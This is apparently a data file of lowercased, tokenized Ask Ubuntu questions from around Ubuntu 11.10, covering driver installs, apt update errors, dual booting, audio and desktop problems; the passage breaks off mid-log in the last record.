90940	how to move / copy logical volume ( lv ) to another volume group ( vg ) ?	basically , i want to move / copy several logical volumes ( lv ) into a new volume group ( vg ) . the new volume group reside on a new set of physical volumes . does anyone know how to do that safely without damaging to the data inside those logical volumes ? ?
90943	can i set vim to ftp upload on save ?	i 'm working on a middle size php application . i 'm currently switching from netbeans to vim ( bc it looks gross on ubuntu ) . however , the only thing i do miss from netbeans is a ftp upload after save . my question is : is there a plugin which automatically uploads on save ( or hotkey like ctrl u ) in vim ?
90944	connecting to the internet with ubuntu 11.10	i just installed the newest ubuntu , the 11.10 version . i was using mandriva and windows 7 ultimate . i dont know how to connect the laptop with the internet in the following ways . some one please help 1. tried to connect via bluetooth in my phone . i was using internet , using the same phone and connection , and laptop in mandriva 2 . i have plugged in a wired connection . the system detects it , but dosent start a connection .
90947	how to completely wipe ubuntu 11.10 from hdd ?	i screwed up using a friend 's external hdd and installed ubuntu on it for my new pc . i can still run it from a disk but i have no idea how to completely wipe the hdd of ubuntu . windows wo n't even recognize the device any more .
90957	ca n't get ati hd 6310 driver working for 11.10	i 'm struggeling with getting my zotac nano ad10 machine to work with ati hd 6310 drivers on my ubuntu 11.10 ( 64bit ) installation . here 's how i tried to get it to work : 1 ) downloaded : http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ? type=2.4.1 & product=2.4.1.3.42 & lang=english 2 ) ran it and pressed continue + automatic install . 3 ) it told me to reboot , so i did . 4 ) still slow as crap , went into `` additional drivers '' and selected ati and pressed activate . rebooted . 5 ) still slow , and i checked `` system info '' and it said it was still using `` vesa : wrestler '' , so i tried to reinstall using -- force . 6 ) ubuntu doesnt boot now , it fail on some crash report thing ( ca n't remember name ) . 7 ) i went into prompt , and tried to install the drivers again , but same problem , eventhough installation is successful . how do i resolve this problem ? can someone tell me what to type step by step ? i 'm abit new to linux . /lasse
90958	how do i play audio cds in kubuntu ?	audio cds play fine in ubuntu 11.10 but in kubuntu 11.10 , even with amarok 2.5 , audio cds appear as playback devices and can also be ripped but i can not play the cds directly . amarok shows the cd tracks but trying to play them after adding them to the playlist does nothing . in bangarang , cd tracks do n't show up at all . kscd crashes and does not start . in clementine , cds do n't show up . in mplayer and its front-ends , including smplayer and umplayer , the cd sound stutters because , according to the mplayer log , the cd cache for mplayer does not respond ( irrespective of the cache size ) . in kaffeine with xine , the cd plays ( at least the first track ) but there is no list of tracks and neither can i skip tracks . gnome-based cd players such as sound juicer and goobox pull in half of gnome itself , which is undesirable . so , i seem to have run out of options , except for vlc , winamp-inspired ( qmmp , audacious ) and mono ( banshee ) , all of which i want to avoid . is there any way to make audio cds play with either gstreamer , xine or mplayer ( preferably gstreamer ) ?
90963	how can i solve a `` failed to set metamode ( 1 ) dfp-0 : nvidia-auto-select '' hdmi error ?	every time i try to connect my laptop ( nvidia geforce gt 420m ) on my tv via hdmi i get this error : failed to set metamode ( 1 ) dfp-0 : nvidia-auto-select what does this mean and how can i solve the error ?
90966	ubuntu network permissions	i am too lazy to get up off the couch to walk over to my ubuntu 11.04 box to change some file permissions . i realize asking this question takes more effort than getting up , but curiosity got the better of me . i am able to do anything to this windows laptop from my ubuntu machine via the network , by simply logging in as the administrator of the machine . is there a way to gain root access to my ubuntu public folder from the network via this windows laptop ? i have samba server setup on the ubuntu box , but no remote desktop of any kind . please help me , because i want to watch apocolypse now , but i am far too lazy to get up . thanks in advance , scott
90972	how to apply group policy ?	i have a windows server and all the clients are linux based ( ubuntu 11.10 ) , i want to set up group/domain policy on my network . please suggest anything other than likewise-open policy . how to apply group policy in local machine ?
90973	spellchecker in lyx : right dictionary configuration	i have installed lyx 2.0.0 from the ubuntu 11.10 software center . i am trying to use the spellchecker but it is not working as it is not able to identify any grammatical mistake . which would be the right configuration to link lyx with a given dictionary ( for several languages as well ) such as the pre-installed aspell in ubuntu ?
90975	audio does n't work on a dell vostro 3550 laptop	i have installed ubuntu 10.4.3 on dell vostro 3550 laptop . i have installed all files related to audio but audio is not working on this laptop .
90976	usb drive not mounting	i am 90 % sure the drive is fine : - ( - was copying data from it yesterday . lent the drive from a mate to copy data , now it ca n't be found , plugging in and out no change - aaahhh he is going to kill me . please help : - )
90978	mysql problem '/var/run/mysqld/mysqld.sock '	i got this error on my php script with db : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) and on phpmyadmin : # 2002 can not log in to the mysql server what is the problem , how can i fix this ? i have installed lamp-server..
90980	installation of driver permission denied	i am trying to install a driver but after antony @ antony and password etc cd /home/you-user-name/downloads and then typed ./ati-driver-installer-11-12-x86.x86_64.run i get permission denied . can someone tell me how to solve this install to the driver please or how to go about doing it a better way . ok the commands chmod u+x ati-driver-installer-11-x86.x86_64.run sudo ./ati-driver-installer-11-x86.x86_64.run didnt work so using the file permission suggested by javier the driver runs but i get the follow message . you are running a x86 machine with libc5 you need to run this installer as the super user . any suggestions ? or should i open a new question should i use the restricted drivers utility and if so how do i do that ? catalyst gives me.. for further configuration of the driver , please run anticonfig from a terminal or amd ccc : le from desktop manager menu.. i ran sudo aticonfig -- initial after antony @ antony and got command not found . uname -a gives 3.0.0-12-generic hash20-ubuntu smp the ati site is offering a the same driver for 32b again the _64.run at http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx is it a problem at ati.com or should i update 11.10 32b to 64b and start again ? thanks
90982	how to make a script in init.d run later	a package installed /etc/init.d/ccpd which is a script run at start up . i would like this script to be run as very last of all my start up scripts , how can i achieve this ?
90983	how to bypass the apturl and download the deb file directly ?	i want to download this game 0a.d . from http : //www.playdeb.net/software/0 % 20a.d . .deb file . they keep their file up to date with the source code , so they have the newest versions . i do n't want apturl to handle it . i just want the deb so i can install in on a machine at home which does not have an internet connection . how can i just download the .deb file it points to . if fact it does not matter what my reason is . i just want to be able to download a file that is manged by apturl . it is easier if all my friends do n't have to download the file at the same time to play , i just share it from a shared drive on my machine .
90987	get a sqlite3 db in libreoffice ( via odbc ) . using ubuntu 11.04 ( 64bit )	i 'm stuck with this . i had sqlite working with openoffice in the past . but since then i reinstalled my machine and so ... now i ca n't get it to work . i pretty much followed this guide : http : //documentation.openoffice.org/how_to/data_source/sqlite.pdf except that i changed ( with sudo odbcconfig ) the sqlite drivers config to : driver : /usr/lib/odbc/libsqlite3odbc.so driver64 : /usr/lib64/odbc/libsqlite3odbc.so setup : /usr/lib/odbc/libsqlite3odbc.so setup64 : /usr/lib64/odbc/libsqlite3odbc.so ( those files exist on my system ) i also added my database under the user dsn tab . when i start libreoffice base and browse for a odbc datasource it turns up empty . i guess this is n't easy to answer without having access to my system . but maybe anyone has an idea ? or some way to debug the connection that i 'm not aware of ? here are some info about my packages : $ dpkg -- get-selections | grep odbc libodbcinstq1c2 install libsqliteodbc install odbcinst install odbcinst1debian2 install unixodbc install unixodbc-bin install $ dpkg -- get-selections | grep sqlite libaprutil1-dbd-sqlite3 install libmono-sqlite1.0-cil install libmono-sqlite2.0-cil install libqt4-sql-sqlite install libsqlite0 install libsqlite3-0 install libsqliteodbc install sqlite3 install sqlitebrowser install sqliteman install sqliteman-doc install thanks alot !
90993	how to let networkmanager manage wlan interface after upgrade ?	i upgraded a ubuntu system from 11.04 to 11.10 via do-release-uprade . now some things does not work as before . for example now , my user needs to be part of the scanner group to be able to use xsane etc . - with < 11.10 this apparently was not necessary . to be able to use nm-applet again ( for wired networking ) i needed to add the user to the group netdev after the upgrade . but wlan management still does not work via networkmanager - nm-applet just does not display any wireless devices . in the logs there is : networkmanager wlan0 deactivating device reason managed ( inter-punctuation removed ) but why it is suddenly managed ? i checked /etc/network/interfaces and it does not contain any wlan0 entries . and /etc/networkmanager/networkmanager.conf just contains : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=true is there some other group the user needs to be part of ? or what else could be messed up after an upgrade ? manually connecting to a wlan-ap via wpasupplicant and dhclient ( after stopping networkmanager ) works perfectly fine . edit : btw , this ubuntu system is a little bit non-standard : wdm is configured as display manger instead of lightdm as window manager i use awesomewm
90997	unable to record sound from web browser ( firefox / chromium ) using recordmydesktop	i have to do some screencast tutorials and i am using recordmydesktop with gtk frontend to do it . i need to record also the sound and here is where i have found the problem . it took me some time , but now i can record the sound from almost every application in my desktop ... almost . i need to capture some sound from a web application using java , but when i load the page nothing appears in the playback tab of pavucontrol . i think this is the problem , because if there is no sound stream i think the recordmydesktop program thinks there is no sound to record ... the funny thing is that i can ear the sound in my speakers ! i have tried with firefox and chromium with no success . although i have been able to record youtube videos without problem , so it seems that java is the key here . any suggestion or idea ? p.s . : i am using ubuntu 11.10 with this configuration . ( if more information is needed please let me know ) sight i can not post images ... so i have an audigy2 sound card using analog stereo output profile . i have also an `` internal audio '' device , but i have it with the `` off '' profile . in recordmydesktop- > advanced- > sound : device = default
91004	i can not delete any or all contacts with the u1 webinterface	i 'm not able to delete a single contact or all contacts on the ubuntu one website . i have a new computer and want to start with an empty address book on ubuntu one for several reasons .
91006	update manager generates 404 error while attempting update . will not update	while running update manager in ubuntu 11.10 oneric ocelot i receive this list of errors . > w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/main/source/sources > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/restricted/source/sources > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/universe/source/sources > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/multiverse/source/sources > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/main/binary-i386/packages > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/restricted/binary-i386/packages > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/universe/binary-i386/packages > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\us.archive.ubuntu.com/ubuntu/dists/oneric-backports/multiverse/binary-i386/packages > 404 not found [ ip : 91.189.92.180 80 ] , w : failed to fetch > http : \\\archive.canonical.com/ubuntu/dists/oneric/partner/source/sources > 404 not found , w : failed to fetch > http : \\\archive.canonical.com/ubuntu/dists/oneric/partner/binary-i386/packages > 404 not found , w : failed to fetch > http : \\\ppa.launchpad.net/madman2k/ubuntu/dists/oneric/main/binary-i386/packages > 404 not found , w : failed to fetch > http : \\\ppa.launchpad.net/madman2k/ubuntu/dists/oneric/restricted/binary-i386/packages > 404 not found , w : failed to fetch > http : \\\ppa.launchpad.net/madman2k/ubuntu/dists/oneric/universe/binary-i386/packages > 404 not found , w : failed to fetch > http : \\\ppa.launchpad.net/madman2k/ubuntu/dists/oneric/multiverse/binary-i386/packages > 404 not found , e : some index files failed to download . they have been > ignored , or old ones used instead . i am a network technician by trade , so confirmation bias told me i needed to check my network connection first . i kicked off my loving sister 's bandwidth hog , checked my bandwidth , and was back to 19.9mbps through . good enough for updates ... or not . this error list is being generated verbatim every time i attempt to update . my package manager informs me that i have not updated my list in 22 days . ( i know my slashes are backwards . i 'm new , so if i try to post my log as it appears in the error box i 'm told i 'm posting too many links ) edit : well , that was silly . i just did some prodding on the ubuntu update servers while i was asking the question and i found my own answer . i still believe this information may be useful to other users , so i will not delete the question . here goes : the issue here is that someone , somewhere misspelled `` oneiric '' in the original hierarchy of directories for the update servers . updates worked fine while the misspelling was reflected in the original sources.list file distributed with 11.10 , but upon correcting this rather amusing mistake , some admin somewhere blocked some users ( like me ) from accessing the folders listed at /oneric-backports/main ( since they no longer exist ) replacing /oneric-backports/main with /oneiric-backports/main in my sources.list should fix this little problem lickety split . edit # 2 : my manager would like to inform the public that madman2k no longer has data hosted at ppa.launchpad.net , which would account for the 404 from those last few bits of the error .
91007	is there a way to speed up the boot to the first menu on the live cd ?	is there a way to speedup the boot to the menu where you choose the livecd or instalation withou cutting your wrist first ? 11.10 version is too slow compared with the 8.10 or 9.04 boot and not to mention the os with daily use .
91011	the panel encountered a problem while loading `` oafiid : gnome_panel_trashapplet '' what does it mean ?	the panel encountered a problem while loading `` oafiid : gnome_panel_trashapplet '' what does it mean ? what is oafiid : gnome_panel_trashapplet ? should i click do n't delete or delete ?
91018	pdfcrop will not work in 11.10	since i upgraded to ubuntu 11.10 pdfcrop will not work . it runs and produces a file , but the product is exactly the same as the original , with no cropping . has anyone else noticed this ? and does anyone know of a fix ?
91023	how to run interactive python script after boot as user user	i want to run my system configuration script ( written in python ) after boot . system should ask for password for user user and run my script . after that system should reboot , eventually run gui . i would like to know what is best method to do something like that . user should not have access to bash ... this is just for base configuration . i would like this to be option in grub , so user can run normal system or configuration script .
91031	java_home directory is not correct though it exists in my environment file	i 'm using java jdk with maven and i have the following /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' # maven settings export java_home=/usr/local/jdk1.6.25/ export m2_home=/usr/local/apache-maven/apache-maven-3.0.3 export m2= $ m2_home/bin export path= $ m2 : $ path the /usr/local/jdk1.6.25 does exist , but when i run mvn -version i get ... warning : java_home environment variable is not set . apache maven 3.0.3 ( r1075438 ; 2011-02-28 17:31:09+0000 ) maven home : /usr/local/apache-maven/apache-maven-3.0.3 java version : 1.6.0_23 , vendor : sun microsystems inc. java home : /usr/lib/jvm/java-6-openjdk/jre default locale : en_us , platform encoding : utf-8 os name : `` linux '' , version : `` 3.0.0-14-generic '' , arch : `` i386 '' , family : `` unix '' does anyone know why this does not think my java_home directory is correct even though it exists in my environment file ?
91034	ubuntu shows a grey error dialog message on load when i enter password	when i boot up my ubuntu vm i get - `` could not connect to session bus : //bin/dbus-launch terminated abnormally without any error message '' does anyone know how to fix this , or even diagnose it ? i 'm really new to using this os and i was trying to install maven if that 's any help . thanks , david edit : virtualisation == vmware , host = windows 7 edit 2 : ok so it looks like i broke my /etc/environment when i login to ubuntu ( by pressing ctrl-alt-f2 ) if i try to do `` sudo nano /etc/environment '' i get `` the command could not be located because '/usr/bin : /bin ' is not included in the path environment variable . does this help at all ? : )
91036	how do i install the binary ati graphics driver ?	i have been trying all day to get a driver up and running on my quad core 64b machine runing 11.10 32b . i put the driver into downloads and eventually got it permission . however i am not there yet . the below commands did not work : chmod u+x ati-driver-installer-11-x86.x86_64.run sudo ./ati-driver-installer-11-x86.x86_64.run sudo sh ./ati-driver-installer-11-12-x86.x86_64.run it results in : sh : cant open sudo sh ./ati-driver-installer-11-12-x86.x86_64.run catalyst gives me : for further configuration of the driver , please run anticonfig from a terminal or amd ccc : le from desktop manager menu . i ran sudo aticonfig -- initial after antony @ antony and got `` command not found '' . running sudo aticonfig -- initial gives : sudo ati-config : command not found can someone see where i am going wrong ? or where to next ?
91039	how to find real file from link	ls -l java lrwxrwxrwx 1 root root 22 2019-02-17 11:37 java - > /etc/anotherlink/java when i do ls -l it shows path to file , but that file can also be a link . is there any way to show path to real file ?
91041	trouble dual booting ubuntu after installation	i just installed ubuntu to my new lenovo thinkpad so it could dual boot with windows 7 . i downloaded the iso file from ubuntu and put it onto a flash drive . i restarted my computer , booted from the flash drive and got the standard options ( 1. try ubuntu 2. install ubuntu 3. check for disc problems ) . i went ahead and installed it onto my computer , choosing to install with another operating system . everything about the installation seemed normal . now , once that installation was complete , it asked me to restart my computer ( so i did ) , and on start up , it loaded windows without even giving me the option of running ubuntu . i went to askubuntu.com and found that i might need to install grub into the mbr using easybcd . i attempted to do so but all i got on reboot ( after choosing to either run windows or ubuntu ) was a terminal with the most basic instructions . at this point my disc is already partitioned . so basically i ca n't even figure out how to access ubuntu from startup at all . i asked askubuntu about this problem and someone suggested using a boot-repair to fix it , but , since the only ubuntu i can access is the `` try ubuntu '' , it gives me an error any time i run the boot-repair program ( efi partition not located error ) . so , basically , i was wondering if there was any way to get ubuntu running , after a seemingly successful install , if i ca n't access ubuntu at all . here i tried adding mbr using easybcd in the `` add new entry '' option ( if i did something wrong there , i selected partition 4 ) http : //i.imgur.com/mjfps.png here is a picture of my partitioned disc in windows disc management http : //i.imgur.com/blsbi.png thank you for all of your help .
91046	debugging desktop loading delay	something is causing my desktop to take a long time to load ( ~15s ) . i can log in , and it displays my wallpaper , but i cant see my desktop or any menus for reasonably long period of time . how can i find out whats taking so long to load ? im using 11.10 x64
91059	wine sound problems	wine 1.3.25 changed the way sound works in wine . as omg ! ubuntu ! reported : wine 1.3.25 ( ... ) saw a ‘total rewrite of audio support’ and the removal of several audio drivers . the result is breakage of audio support for wine apps through pulseaudio – ubuntu’s default sound server . — http : //www.omgubuntu.co.uk/2011/07/latest-wine-update-breaks-pulseaudio/ so i have tried to avoid the problem by using playonlinux to set an older wine version for every application on a different wineprefix . but there are some applications that work much better on more recent versions , or simply wo n't run on wine < 1.3.25 . so i had to upgrade . and that 's when audio problems started . some examples : rollercoaster tycoon 3 ( demo ) audio sounds in a terrible way i do n't know how to describe ( rough ? jagged ? i can try to record it if you want ) , and then after a few seconds it stops altogether , even after executing winetricks quartz . the world in conflict demo has a similar problem , though in this case sound lasts a little longer . the game is rated platinum on appdb for wine 1.3.20 , though , so in this case i can just downgrade that specific prefix . but this is not always the case . edit : found a workaround . see comments . sound in videos in the steam client either does n't work or sounds just like world in conflict . portal just does n't want to work . audio stops working when you get to the main menu . if you 're lucky , after restarting it several times it works for some time , but then it randomly stops working again , forcing the player to quit the game . it has a platinum rating on appdb for version 1.3.35 on arch , but only bronze on ubuntu on 1.3.34 because of the sound issues . portal 2 is like portal , but even worse : when you get past the main menu , it stops working after a few seconds . some of these may be normal wine bugs , but since the first three are so similar and all these problems seem to affect ubuntu only , this problem has to be caused by that 'total rewrite of audio support ' in wine 1.3.35 . i have read lots of ask ubuntu questions and things posted on other websites , but nothing i have tried has solved my problems so far . killing pulseaudio just makes the sound indicator disappear for a second , until pulseaudio is automatically restarted . disabling it for wine does n't work either : running pasuspender -- winecfg and clicking on the test audio button just makes the wine window `` go dark '' . so , is there any way to fix this ? edit : getting the debs from this place ( from the launchpad bug tells me it has unmet dependencies , and if i try to install that dependency , synaptic tells me it has to remove a whole lot of packages ! not willing to do that .
91062	live cd does n't boot properly when trying to install	i 'm to install ubuntu 11.10 , but when i boot with ubuntu cd and go into `` install ubuntu '' or `` try ubuntu '' it just shows the background and does n't do anything from there . other people say that i should get a normal desktop with icons and taskbars , but well , mine does n't show anything . i ca n't even open the terminal , or any other hot keys . i 've tried burning the cd 4 times , all different ways in different programs , and it still does n't work . how can i install it ?
91065	how to create a scope ?	i 'd like to create a custom scope that searches and returns results from an online source for personal use . is this possible ? and if so , how ?
91067	problem with microsoft core fonts installer	yes , very strange problem indeed . i installed gnome package for a more beautifull design on my ubuntu , i do n't like the looks of unity and now , each time i run a command in the terminal , a windows called `` configuring ttf-mscorefonts-installer '' appear . it ask me to accept the `` end-user license agreement for microsoft software '' . but this windows appear in my terminal ! even tough it have an `` ok '' button , i ca n't click it . pressing enter do n't work . pressing y then enter , does n't work . and if i close the terminal window , i ca n't run any sudo , it tells me the ressource is currently used . pressing escape dose n't work either help ? edit : when i close the terminal , it tells me that a program is running and closing the terminal will kill it , so i hit ok . when i try to run my sudo line again , after reopenning the terminal here is the message i get : e : could not get lock /var/lib/dpkg/lock - open ( 11 : ressource temporarily unavaillable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? the only way to run a command when this lock is on , is to restart the pc ( i 'm using a virtual machine , so it does n't matter ) . and even once the machine restarted , i still get the prompt from the microsoft font edit2 : the answer is in the comments ... .sorry for bothering
91068	assigning / partitioning empty disk space	i have a 500gb hard drive on my ubuntu server . i partitioned 150gb for the os and anything that needs to run on the server ( websites , apis , whatever ) , and left the other 350gb for backups of important network resources . my question is , how can i use that empty disk space so that i can mount it and copy gzipped files there from my network ? i do n't need any networking help , just need to know how to create another partition my hard drive that will be used only for storage . thanks !
91070	recuva alike software for ubuntu 11.10	recuva is a software in windows used to undelete files piriform recuva it has a nice gui and is very dependable , i googled and yahood for similar softwares for ubuntu but couldnt find one ( few recovery softwares were terminal-through-types ) is there any nice such softwares ?
91072	how do you get details from the output of the locate command ?	when i run the ls -l command i get details about the files in the current directory like permissions , owner , group , file size . is there a way i can get these same details instead of just the location of the file when i run locate ?
91102	prerequisities to installing openldap on a clean ubuntu 11.10 server install	i have just installed a fresh install of ubuntu 11.10 server and would like to setup an ldap server . can someone please assist me to what i need to install prior to slapd and ldap-utils . the server is a private server and does not require a domain name for the internet . i am using phpldapadmin and can login with with cn=admin , dc=nodomain but then on the left side it says : logged in as : dc=example , dc=com this base entry does not exist.create it ? i click on create and nothing happens .
91108	`` ca n't read file '' error after installation causes system to not boot	i have recently installed ubuntu 11.10 on my system along with windows xp . previously i have ubuntu 9.04 , i have deleted those partitions and installed 11.10. installation is complete but i am unable to boot into ubuntu . following is the error . error : ca n't read file error : load kernel first . any help is really appreciated .
91109	freenas and ubuntu install on same machine	i wanted to know if anyone has installed freenas and ubuntu on the same machine by partitioning the hard drive ? what i 'm looking to do is have a nas and wanted to experiment running owncloud . or and i going about this all wrong . i have a couple of hdtv ( boxee ) machines and wanted to move to a centralized media location ( freenas ) , but also wanted to access some stuff from the web as well for my mobile devices and maybe sharing some family movies/photos with relatives ( owncloud ) . other ideas are welcome
91112	how to remove ( delete ) the mgse & mate packages ?	i 've stuck when i installed the mate package , not only i ca n't update my system more but also i ca n't open the software center and synaptic packet manager ! how can i remove the mate with all its details from my ubuntu machine ?
91114	no pubkey in xubuntu 11.10 when i use apt-get update	w : gpg error : http : //download.opensuse.org release : the following signatures could n't be verified because the public key is not available : no_pubkey 85753aa5eefefde9 w : gpg error : http : //download.opensuse.org release : the following signatures could n't be verified because the public key is not available : no_pubkey 51afc9b27331e9c4 thx
91117	purple then black screen after booting ?	i have a gateway laptop with a a4 vision amd processor and dual core and amd radeon graphics . i just installed ubuntu 11.10 by ubuntu disk but every time i try to boot into ubuntu , the screen turns purple and then black . thanks for answering .
91118	gnome shell extension empty	here is the situation . changed unity shell to gnome shell . installed the gnome tweak tool , installed the shell extension , themes , etc ... everything i normally need to do that is installed when i go to gnome tweak tool , and click on shell extension , the right list is empty i 've surfed the web and questions for answer . yes , i did restart my pc after installing everything , even restarted a couple of time . yes , i clicked the cog and chose gnome instead of ubuntu . to no avail , i ca n't seem to see what is supposed to be on that right menu . i saw some screenshot , and i know it is supposed to be filled with radio buttons and such i 've tried the suggested answer here - gnome tweak tool does not show extensions but this is the result : cd ~/.local/share/gnome-shell/extensions/ cd ~/.local/share/gnome-shell/extensions/ : no such file or directory i installed the following gnome-shell extensions which are not appearing in gnome-tweak-tool : gnome-shell-extensions-alternative-status-menu gnome-shell-extensions-common gnome-shell-extensions-user-theme all of that info gotten from synaptic , which i also installed ! all package were installed in root mode , updates and upgrades done also , the terminal just popped an error as i tryied to get into the tweak tool , first time it pop me the error : critical : error parsing schema org.gnome.shell ( /usr/share/glib-2.0/schemas/org.gnome.shell.gschema.xml ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/gsettings.py '' , line 45 , in __init__ summary = key.getelementsbytagname ( `` summary '' ) [ 0 ] .childnodes [ 0 ] .data indexerror : list index out of range warning : shell not running traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 57 , in __init__ self._shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 123 , in __init__ v = map ( int , proxy.version.split ( `` . '' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 46 , in version return json.loads ( self.execute_js ( 'const config = imports.misc.config ; config.package_version ' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 39 , in execute_js result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : could not list shell extensions traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 62 , in __init__ extensions = self._shell.list_extensions ( ) attributeerror : shellthemetweak instance has no attribute '_shell' warning : error detecting shell traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 145 , in __init__ shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 123 , in __init__ v = map ( int , proxy.version.split ( `` . '' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 46 , in version return json.loads ( self.execute_js ( 'const config = imports.misc.config ; config.package_version ' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 39 , in execute_js result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files ( gnome-tweak-tool:2327 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed i also tryied `` sudo apt-get remove gnome-tweak-tool '' and `` sudo apt-get install gnome-tweak-tool '' to no avail . still the same long error message help ? edit : i have scrapped the whole virtual machine , and reinstalled it . 30 gb of hard drive ubuntu 11.10 728 mb of video memory home folder not encrypted here is what i have done : sudo apt-get install gnome-shell reboot boot into gnome sudo add-apt-repository ppa : webupd8team/gnome3 sudo apt-get update sudo apt-get install gnome-tweak-tool and still the same ! screenshot of desktop . also , a printscreen of gnome tweak tool :
91119	update manager refuses to update	it seems i 've run into a small issue after installing ubuntu 11.10 . after the installation of the upgrade , everything worked fine for a while . one day i went into `` update manager '' and checked for updates ( this is due to all the recent downloads i made , so i was curious to know if they had to be updated for better use . ) , but after it read all the updates a error message appeared ... failed to download repository information check your internet connection . i then clicked details to view the problem ... ( this is what appeared under 'details ' ) w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/bisigi/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . ( please excuse me for this , and i do apologize . i 'm very new at ubuntu and i 'd appreciate some assistance with this . thanks . ) edit : further information : cat /etc/apt/sources.list : http : //paste.ubuntu.com/786323/ sudo apt-get update : http : //paste.ubuntu.com/786326/ sudo apt-get upgrade : http : //paste.ubuntu.com/786329/
91120	bluetooth internet / dun ( network-manager ) only works with phone newly started	i connect to mobile internet over bluetooth and the nokia c7 phone . the bluetooth connection works successfully when the phone is freshly started ( i.e . i click on the connection , properly set-up , in the nm-applet and it connects ) , but when not , i get this in dmesg : dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) starting connection 'vodafone predefinito' dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > ( 94:20:53 : d9 : c8 : c8 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 1 of 5 ( device prepare ) scheduled ... dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 1 of 5 ( device prepare ) started ... dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 2 of 5 ( device configure ) scheduled ... dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 1 of 5 ( device prepare ) complete . dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 2 of 5 ( device configure ) starting ... dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > ( 94:20:53 : d9 : c8 : c8 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] dec 28 21:28:16 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 ) stage 2 of 5 ( device configure ) complete . dec 28 21:28:20 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8 94:20:53 : d9 : c8 : c8/bluetooth ) stage 2 of 5 ( device configure ) successful . will connect via dun . dec 28 21:28:20 falx networkmanager [ 1031 ] : < info > activation ( 94:20:53 : d9 : c8 : c8/bluetooth ) stage 2 of 5 ( device configure ) waiting for modem to appear . dec 28 21:28:20 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) opening serial port ... dec 28 21:28:20 falx kernel : [ 23928.016873 ] rfcomm_tty_ioctl : tiocgserial is not supported dec 28 21:28:21 falx modem-manager [ 998 ] : < info > ( rfcomm0 ) closing serial port ... dec 28 